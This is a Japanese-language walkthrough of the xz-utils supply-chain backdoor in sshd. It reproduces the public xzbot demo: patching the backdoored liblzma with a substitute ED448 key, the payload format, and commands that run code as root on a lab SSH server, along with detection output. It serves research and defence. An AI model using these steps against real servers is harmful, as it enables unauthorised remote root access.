1. 事件背景#
3 月 29 日、マイクロソフトの PostgreSQL 開発者 Andres Freund は oss-security で、オープンソースプロジェクト xz-utils にバックドアの脆弱性が存在することを発表しました。このプロジェクトはサプライチェーン攻撃を受け、プロジェクトのメンテナーである jiaT75(jia Tan)がバイナリテストファイルをアップロードし、コンパイルスクリプトを改ざんすることで、コンパイルプロセス中に悪意のあるバイナリファイルが元のファイルを置き換えるようになり、コンパイル出力が公開されたソースコードと一致しなくなりました。
この脆弱性により、攻撃者は systemd サービスを介して sshd を妨害し、リモートでシステムへのアクセス権を取得することができます。主に Fedora、openSUSE、Debian などの Linux ディストリビューションのテスト版に影響を与えます。CVE スコアは 10/10 です。影響を受ける XZ Utils のバージョンは 5.6.0 から始まり、ユーザーには直ちに無効化または安全なバージョン(5.4.6 など)にダウングレードすることが推奨されています。
2. 攻撃プロセス#
1). 蜜罐搭建#
詳細はopenssh.patchを参照してください。これは、バックドア形式と一致する公開鍵を使用して接続しようとする試みを記録するための簡単なパッチです。
$ git clone https://github.com/amlweems/xzbot.git
$ git clone https://github.com/openssh/openssh-portable
$ patch xzbot/openssh.patch
$ autoreconf
$ ./configure
$ make
2).ED448 パッチ#
バックドアはハードコーディングされた ED448 公開鍵を使用して署名検証とペイロードの復号を行います。この鍵を自分の鍵に置き換えることで、バックドアをトリガーできます。
攻撃者の ED448 鍵:
0a 31 fd 3b 2f 1f c6 92 92 68 32 52 c8 c1 ac 28
34 d1 f2 c9 75 c4 76 5e b1 f6 88 58 88 93 3e 48
10 0c b0 6c 3a be 14 ee 89 55 d2 45 00 c7 7f 6e
20 d3 2c 60 2b 2c 6d 31 00
自分の鍵(seed=0 で生成)にこの鍵を置き換えます:
5b 3a fe 03 87 8a 49 b2 82 32 d4 f1 a4 42 ae bd
e1 09 f8 07 ac ef 7d fd 9a 7f 65 b9 62 fe 52 d6
54 73 12 ca ce cf f0 43 37 50 8f 9d 25 29 a8 f1
66 91 69 b2 1c 32 c4 80 00
まず、バックドア付きの libxzma 共有オブジェクトをダウンロードする必要があります。例えば、 https://snapshot.debian.org/package/xz-utils/5.6.1-1からダウンロードします。その後、パッチスクリプトを実行します。詳細はassets/ ディレクトリ内の例を参照してください。
$ pip install pwntools
$ shasum -a 256 liblzma.so.5.6.1
605861f833fc181c7cdcabd5577ddb8989bea332648a8f498b4eef89b8f85ad4 liblzma.so.5.6.1
$ python3 patch.py liblzma.so.5.6.1
Patching func at offset: 0x24470
Generated patched so: liblzma.so.5.6.1.patch
次に、この修正されたliblzma.so.5.6.1.patch共有オブジェクトを使用して sshd を実行します。
3). バックドア形式#
有効なペイロードを持つ CA 署名鍵の SSH 証明書を使用して接続することで、バックドアをトリガーできます。このペイロードは、攻撃者の ED448 鍵を使用して暗号化および署名する必要があります。この構造は以下の形式を持ちます:
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| cmd1 (32 bit) | cmd2 (32 bit) | cmd3 (64 bit) |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| |
+ ciphertext (240 bytes) +
| |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
コマンドバイトは上記の 3 つの値から派生した(cmd1 * cmd2 + cmd3)です。この値が 3 を超えると、バックドアは処理をスキップします。
暗号文は chacha20 アルゴリズムを使用して、ED448 公開鍵の最初の 32 バイトを対称鍵として暗号化されます。したがって、以下の鍵を使用して任意の攻撃試行を復号化できます:
0a 31 fd 3b 2f 1f c6 92 92 68 32 52 c8 c1 ac 28
34 d1 f2 c9 75 c4 76 5e b1 f6 88 58 88 93 3e 48
暗号文の形式は以下の通りです:
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| signature (114 bytes) | command \x00 | padding |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
署名は以下の値に基づいて計算された RFC-8032 ED448 署名です:
ヘッダーの最初の4バイト(cmd1)
コマンドの最初の5バイト
サーバーホスト鍵のsha256ハッシュの最初の32バイト
4). 攻撃デモ#
$ go install github.com/amlweems/xzbot@latest
$ xzbot -h
Usage of xzbot:
-addr string
ssh server address (default "127.0.0.1:2222")
-seed string
ed448 seed, must match xz backdoor key (default "0")
-cmd string
command to run via system() (default "id > /tmp/.xz")
以下のコマンドは、脆弱性のある SSH サーバー(アドレスは 127.0.0.1:2222)に接続し、コマンド id > /tmp/.xz を実行します:
$ xzbot -addr 127.0.0.1:2222 -cmd 'id > /tmp/.xz'
00000000 00 00 00 1c 73 73 68 2d 72 73 61 2d 63 65 72 74 |....ssh-rsa-cert|
00000010 2d 76 30 31 40 6f 70 65 6e 73 73 68 2e 63 6f 6d |-v01@openssh.com|
00000020 00 00 00 00 00 00 00 03 01 00 01 00 00 01 01 01 |................|
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
...
00000150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000160 00 00 01 14 00 00 00 07 73 73 68 2d 72 73 61 00 |........ssh-rsa.|
00000170 00 00 01 01 00 00 01 00 02 00 00 00 01 00 00 00 |................|
00000180 00 00 00 00 00 00 00 00 54 97 bc c5 ef 93 e4 24 |........T......$|
00000190 cf b1 57 57 59 85 52 fd 41 2a a5 54 9e aa c6 52 |..WWY.R.A*.T...R|
000001a0 58 64 a4 17 45 8a af 76 ce d2 e3 0b 7c bb 1f 29 |Xd..E..v....|..)|
000001b0 2b f0 38 45 3f 5e 00 f1 b0 00 15 84 e7 bc 10 1f |+.8E?^..........|
000001c0 0f 5f 50 36 07 9f bd 07 05 77 5c 74 84 69 c9 7a |._P6.....w\t.i.z|
000001d0 28 6b e8 16 aa 99 34 bf 9d c4 c4 5c b8 fd 4a 3c |(k....4....\..J<|
000001e0 d8 2b 39 32 06 d9 4f a4 3a 00 d0 0b 0f a2 21 c0 |.+92..O.:.....!.|
000001f0 86 c3 c9 e2 e6 17 b4 a6 54 ba c3 a1 4c 40 91 be |........T...L@..|
00000200 91 9a 2b f8 0b 18 61 1c 5e e1 e0 5b e8 00 00 00 |..+...a.^..[....|
00000210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
...
00000260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000270 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 07 |................|
00000280 73 73 68 2d 72 73 61 00 00 00 01 00 |ssh-rsa.....|
2024/03/30 00:00:00 ssh: handshake failed: EOF
脆弱性のあるサーバー上で、system () への呼び出しを監視するための監視点を設定し、コマンドが実行されるかどうかを観察できます:
$ bpftrace -e 'watchpoint:0x07FFFF74B1995:8:x {
printf("%s (%d): %s\n", comm, pid, str(uptr(reg("di"))))
}'
Attaching 1 probe...
sshd (1234): id > /tmp/.xz
$ cat /tmp/.xz
uid=0(root) gid=0(root) groups=0(root)
攻撃を受けたプロセスツリーは、正常な sshd プロセスツリーとは異なって見えます:
# normal process tree
$ ssh foo@bar
$ ps -ef --forest
root 765 1 0 17:58 ? 00:00:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
root 1026 765 7 18:51 ? 00:00:00 \_ sshd: foo [priv]
foo 1050 1026 0 18:51 ? 00:00:00 \_ sshd: foo@pts/1
foo 1051 1050 0 18:51 pts/1 00:00:00 \_ -bash
# backdoor process tree
$ xzbot -cmd 'sleep 60'
$ ps -ef --forest
root 765 1 0 17:58 ? 00:00:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
root 941 765 4 18:04 ? 00:00:00 \_ sshd: root [priv]
sshd 942 941 0 18:04 ? 00:00:00 \_ sshd: root [net]
root 943 941 0 18:04 ? 00:00:00 \_ sh -c sleep 60
root 944 943 0 18:04 ? 00:00:00 \_ sleep 60
注意:脆弱性を利用しても、INFO やそれ以上のレベルのログエントリは生成されません。
3. 引用#
https://github.com/amlweems/xzbot
https://www.openwall.com/lists/oss-security/2024/03/29/4
https://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504
https://gist.github.com/q3k/af3d93b6a1f399de28fe194add452d01
https://gist.github.com/keeganryan/a6c22e1045e67c17e88a606dfdf95ae4